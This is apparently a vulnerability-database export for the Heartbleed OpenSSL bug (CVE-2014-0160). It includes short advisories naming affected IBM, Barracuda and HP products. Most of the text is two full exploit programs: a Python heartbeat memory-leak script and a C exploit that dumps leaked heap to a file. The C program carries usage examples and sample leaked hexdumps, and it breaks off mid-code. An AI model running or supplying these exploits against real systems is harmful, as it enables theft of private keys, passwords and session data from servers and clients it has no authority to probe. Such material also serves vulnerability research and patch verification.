The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
{"seebug": [{"lastseen": "2017-11-19T17:26:23", "description": "CVE ID:CVE-2014-0160\r\n\r\nIBM AIX\u662f\u4e00\u6b3e\u5546\u4e1a\u6027\u8d28\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nIBM AIX\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nIBM AIX 6.x\r\nIBM AIX 7.x\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc\r\nhttp://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&ID=3489", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "IBM AIX OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62187", "id": "SSV:62187", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:16", "description": "CVE ID:CVE-2014-0160\r\n\r\nBarracuda\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nBarracuda\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nBarracuda CudaTel Communication Server 2.x\r\nBarracuda CudaTel Communication Server 3.x\r\nBarracuda Firewall 6.x\r\nBarracuda Link Balancer 2.x\r\nBarracuda Load Balancer\r\nBarracuda Load Balancer 4.x\r\nBarracuda Load Balancer ADC 5.x\r\nBarracuda Message Archiver\r\nBarracuda Message Archiver 3.x\r\nBarracuda Web Application Firewall 7.x\r\nBarracuda Web Filter\r\nBarracuda Web Filter 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://www.barracuda.com/blogs/pmblog?bid=2279", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Barracuda\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62181", "id": "SSV:62181", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:52", "description": "CVE ID:CVE-2014-0160\r\n\r\nHP\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nHP\u591a\u4e2a\u4ea7\u54c1\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nHP Onboard Administrator 4.x\r\nHP AssetManager 9.x\r\nHP Diagnostics 9.x\r\nHP IT Executive Scorecard 9.x\r\nHP LoadRunner 11.x\r\nHP LoadRunner 12.x\r\nHP OpenView Connect-It (CIT) 9.x\r\nHP Performance Center 11.x\r\nHP Performance Center 12.x\r\nHP Server Automation 10.x\r\nHP Service Manager 9.x\r\nHP Smart Update Manager (HP SUM) 6.x\r\nHP System Management Homepage 7.x\r\nHP UCMDB Browser 1.x\r\nHP UCMDB Browser 2.x\r\nHP UCMDB Browser 3.x\r\nHP Universal Discovery Universal CMDB Configuration Manager 10.x\r\nHP Universal Discovery Universal CMDB Configuration Manager 9.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.hp.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "HP\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62186", "id": "SSV:62186", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T13:55:16", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86038", "id": "SSV:86038", "sourceData": "\n # Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n\r\ndef create_hello(version):\r\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\treturn hello\r\n\r\ndef create_hb(version):\r\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n\treturn hb\r\n\r\ndef hexdump(s):\r\n\tfor b in xrange(0, len(s), 16):\r\n\t\tlin = [c for c in s[b : b + 16]]\r\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n\tprint\r\n\r\ndef recvall(s, length, timeout=5):\r\n\tendtime = time.time() + timeout\r\n\trdata = ''\r\n\tremain = length\r\n\twhile remain > 0:\r\n\t\trtime = endtime - time.time()\r\n\t\tif rtime < 0:\r\n\t\t\treturn None\r\n\t\tr, w, e = select.select([s], [], [], 5)\r\n\t\tif s in r:\r\n\t\t\tdata = s.recv(remain)\r\n\t\t\t# EOF?\r\n\t\t\tif not data:\r\n\t\t\t\treturn None\r\n\t\t\trdata += data\r\n\t\t\tremain -= len(data)\r\n\treturn rdata\r\n\r\n\r\ndef recvmsg(s):\r\n\thdr = recvall(s, 5)\r\n\tif hdr is None:\r\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\r\n\t\treturn None, None, None\r\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\r\n\tpay = recvall(s, ln, 10)\r\n\tif pay is None:\r\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\r\n\t\treturn None, None, None\r\n\tprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n\treturn typ, ver, pay\r\n\r\ndef hit_hb(s,hb):\r\n\ts.send(hb)\r\n\twhile True:\r\n\t\ttyp, ver, pay = recvmsg(s)\r\n\t\tif typ is None:\r\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\r\n\t\t\treturn False\r\n\r\n\t\tif typ == 24:\r\n\t\t\tprint 'Received heartbeat response:'\r\n\t\t\thexdump(pay)\r\n\t\t\tif len(pay) > 3:\r\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\r\n\t\t\telse:\r\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\r\n\t\t\treturn True\r\n\r\n\t\tif typ == 21:\r\n\t\t\tprint 'Received alert:'\r\n\t\t\thexdump(pay)\r\n\t\t\tprint 'Server returned error, likely not vulnerable'\r\n\t\t\treturn False\r\n\r\ndef main():\r\n\topts, args = options.parse_args()\r\n\tif len(args) < 1:\r\n\t\toptions.print_help()\r\n\t\treturn\r\n\tfor i in range(len(version)):\r\n\t\tprint 'Trying ' + version[i][0] + '...'\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\tprint 'Connecting...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.connect((args[0], opts.port))\r\n\t\tprint 'Sending Client Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hello(version[i][1]))\r\n\t\tprint 'Waiting for Server Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\twhile True:\r\n\t\t\ttyp, ver, pay = recvmsg(s)\r\n\t\t\tif typ == None:\r\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\r\n\t\t\t\treturn\r\n\t\t\t# Look for server hello done message.\r\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\r\n\t\t\t\tbreak\r\n\r\n\t\tprint 'Sending heartbeat request...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hb(version[i][1]))\r\n\t\tif hit_hb(s,create_hb(version[i][1])):\r\n\t\t\t#Stop if vulnerable\r\n\t\t\tbreak\r\n\r\nif __name__ == '__main__':\r\n\tmain()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86038", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:10:46", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86255", "id": "SSV:86255", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n\r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n* \r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n* \r\n* \r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0.."0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |."..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e...."|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q."gf."...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n* \r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char 